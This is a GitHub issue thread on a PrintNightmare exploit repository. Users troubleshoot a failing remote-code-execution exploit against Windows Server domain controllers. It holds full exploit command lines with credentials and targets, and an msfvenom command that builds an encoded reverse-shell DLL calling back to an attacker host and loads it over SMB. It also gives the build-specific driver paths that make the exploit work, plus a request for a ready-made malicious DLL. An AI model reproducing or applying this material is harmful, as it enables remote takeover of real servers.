search

cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527
1.83k stars 581 forks source link

ERROR_PATH_NOT_FOUND #3

Closed kevthehermit closed 3 years ago

kevthehermit commented 3 years ago

Hitting this error,

Target Server 2016 Datacenter

root@kali:~/Desktop/CVE-2021-1675# python3 CVE-2021-1675.py 'testdomain.local/username:P@ssw0rd!@172.31.35.104' '\\172.31.30.112\smb\printer22.dll'
[*] Try 1...
[*] Connecting to ncacn_np:172.31.35.104[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\172.31.30.112\smb\printer22.dll
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 119, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "CVE-2021-1675.py", line 55, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
MortalAndTry commented 3 years ago

hhhh

kevthehermit commented 3 years ago

Same error on a Server 2019 Datacenter

tuian commented 3 years ago

0x00 ERROR_PATH_NOT_FOUND

same on win dc server 2012/server 2016

[*] Try 1...
[*] Connecting to ncacn_np:192.168.44.10[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.44.20\share\1.dll
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 117, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "CVE-2021-1675.py", line 53, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/Library/Python/2.7/site-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py2.7.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/Library/Python/2.7/site-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py2.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

0x02 the unc path is correct.


msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.44.30 LPORT=8080 -b "\x00" -e x86/shikata_ga_nai -f dll -o /tmp/1.dll
// it is ok 
copy  \\192.168.44.20\share\1.dll .
rundll32  1.dll,Start
// it is ok 
rundll32  \\192.168.44.20\share\1.dll,Start
cube0x0 commented 3 years ago

The api could not find your dll or this file is missing https://github.com/cube0x0/CVE-2021-1675/blob/main/CVE-2021-1675.py#L43

Replace the line with one matching your OS build

kevthehermit commented 3 years ago

Thanks For Reference here are the paths i had with the build numbers

OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763

container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_19a3fe50fa9a21b6\\Amd64\\UNIDRV.DLL\x00"
OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393

C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64
C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64
RENYONGTONG commented 3 years ago

Thanks For Reference here are the paths i had with the build numbers

OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763

container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_19a3fe50fa9a21b6\\Amd64\\UNIDRV.DLL\x00"
OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393

C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64
C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64

Same issue, may I ask how you determine your build numbers and path of the driver? Further, can I have a copy of the DLL file for testing? I am freshman and don't know how to generate one. Thanks.

LLPMR commented 3 years ago

Thanks For Reference here are the paths i had with the build numbers

OS Name:                   Microsoft Windows Server 2019 Datacenter
OS Version:                10.0.17763 N/A Build 17763

container_info['DriverInfo']['Level2']['pDriverPath']  = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_19a3fe50fa9a21b6\\Amd64\\UNIDRV.DLL\x00"
OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393

C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64
C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64

Same issue, may I ask how you determine your build numbers and path of the driver? Further, can I have a copy of the DLL file for testing? I am freshman and don't know how to generate one. Thanks.

Did you find the answer?